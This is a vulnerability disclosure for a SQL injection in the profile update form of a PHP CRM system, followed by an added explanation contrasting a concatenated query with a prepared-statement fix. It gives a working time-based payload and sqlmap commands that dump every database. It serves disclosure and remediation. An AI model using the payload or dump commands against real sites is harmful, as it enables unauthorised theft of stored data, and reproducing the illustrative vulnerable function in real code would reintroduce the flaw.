CVE/CVE-2023-24655/CVE-2023-24655.txt
> [Suggested description]
> Simple Customer Relationship Management System v1.0 was discovered to
> contain a SQL injection vulnerability via the name parameter under the
> Profile Update function.
>
> ------------------------------------------
>
> [Additional Information]
> Steps-To-Reproduce:
> 1. Now register a user by navigating to the URL: http://localhost/php-scrm/registration.php
> 2. Now log in as the registered user with valid credentials by following the URL: http://localhost/php-scrm/login.php
> 3. Now navigate to the profile update page by following the URL: http://localhost/php-scrm/profile.php
> 4. Now fill out your profile form, then intercept the request in Burp Suite.
> 5. Now send the request intercepted by Burp Suite to Burp Repeater.
> Payload: ' AND (SELECT 123 FROM (SELECT(SLEEP(10)))abc)-- abc
> 6. Now insert the payload in the name parameter.
>
> Content-Disposition: form-data; name="name"
>
> user1' AND (SELECT 123 FROM (SELECT(SLEEP(10)))abc)-- abc
>
> 7. Now click on the "Send" button to send the request.
> 8. Now you will see that the response is delayed by 10 seconds, which shows that it is vulnerable to SQL injection.
> 9. Now dump data by using sqlmap.
> 10. Now copy the request intercepted by Burp and create a file crm-profile-request.txt
>
> 11. Now dump databases with sqlmap.
> # python sqlmap.py -r crm-profile-request.txt -p name -dbs --batch
> 12. Now dump all data with sqlmap.
> # python sqlmap.py -r crm-profile-request.txt -p name --dump-all --batch
>
> ------------------------------------------
>
> [Vulnerability Type]
> SQL Injection
>
> ------------------------------------------
>
> [Vendor of Product]
> https://www.sourcecodester.com
>
> ------------------------------------------
>
> [Affected Product Code Base]
> Simple Customer Relationship Management (CRM) System - 1.0
>
> ------------------------------------------
>
> [Affected Component]
> http://localhost/php-scrm/profile.php
>
> ------------------------------------------
>
> [Attack Type]
> Remote
>
> ------------------------------------------
>
> [Impact Code execution]
> true
>
> ------------------------------------------
>
> [Impact Escalation of Privileges]
> true
>
> ------------------------------------------
>
> [Impact Information Disclosure]
> true
>
> ------------------------------------------
>
> [Attack Vectors]
> SQL injection is a type of cyber attack in which an attacker inserts malicious code into a website's SQL statements in order to gain unauthorized access to sensitive information stored in a database. This type of attack can be used to steal sensitive information such as login credentials, personal information, and financial data. These attacks can have serious consequences, including:
>
> 1. Theft of sensitive data: An attacker can use SQL injection to access and steal confidential data from a database, such as passwords, financial information, or personal information.
> 2. Modification of data: An attacker can use SQL injection to alter or delete data from a database, potentially causing incorrect results or system failures.
> 3. Server compromise: In some cases, an attacker can use SQL injection to gain unauthorized access to the underlying operating system and take complete control of the server.
>
> ------------------------------------------
>
> [Reference]
> https://www.sourcecodester.com/php/15895/simple-customer-relationship-management-crm-system-using-php-free-source-coude.html
> https://www.sourcecodester.com/sites/default/files/download/oretnom23/php-scrm.zip
>
> ------------------------------------------
>
> [Discoverer]
> Yogesh Verma
Use CVE-2023-24655.
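The report above does not include the affected source, so the following is an added example, not code from the php-scrm project: a hypothetical reconstruction of the profile-update pattern that makes the reported `name` payload behave as SQL, beside the prepared-statement form that stores it as a plain string. The `users` table, its `id` and `name` columns, and the `$pdo` connection are assumptions.

```php
<?php
// Added example (not the project's code). Assumed schema: users(id, name).

// VULNERABLE pattern: the submitted name is concatenated into the statement,
// so the reported payload
//   user1' AND (SELECT 123 FROM (SELECT(SLEEP(10)))abc)-- abc
// closes the string literal, runs SLEEP(10) on the server, and comments out
// the rest of the statement. The 10 second delay is the time-based oracle
// that sqlmap's -p name detection relies on.
function updateNameUnsafe(PDO $pdo, int $userId, string $name): void
{
    $sql = "UPDATE users SET name = '" . $name . "' WHERE id = " . $userId;
    $pdo->exec($sql);
}

// FIXED pattern: the statement text is fixed and the values travel as bound
// parameters, so the same payload is written to the name column verbatim and
// never reaches the SQL parser. Disabling emulated prepares makes MySQL
// itself do the separation rather than the PDO driver quoting client-side.
function openDb(string $dsn, string $user, string $pass): PDO
{
    return new PDO($dsn, $user, $pass, [
        PDO::ATTR_EMULATE_PREPARES => false,
        PDO::ATTR_ERRMODE          => PDO::ERRMODE_EXCEPTION,
    ]);
}

function updateNameSafe(PDO $pdo, int $userId, string $name): void
{
    $stmt = $pdo->prepare("UPDATE users SET name = :name WHERE id = :id");
    $stmt->bindValue(':name', $name, PDO::PARAM_STR);
    $stmt->bindValue(':id', $userId, PDO::PARAM_INT);
    $stmt->execute();
}

// Usage (assumed DSN and credentials): the session user's id comes from the
// server-side session, not from the form, so a user can only update own row.
// $pdo = openDb('mysql:host=127.0.0.1;dbname=php_scrm;charset=utf8mb4', 'app', 'secret');
// updateNameSafe($pdo, (int) $_SESSION['user_id'], (string) ($_POST['name'] ?? ''));
```

With the fixed form, the request from step 6 completes immediately and the stored name is the literal payload string, which also removes the timing signal that sqlmap uses to confirm the injection.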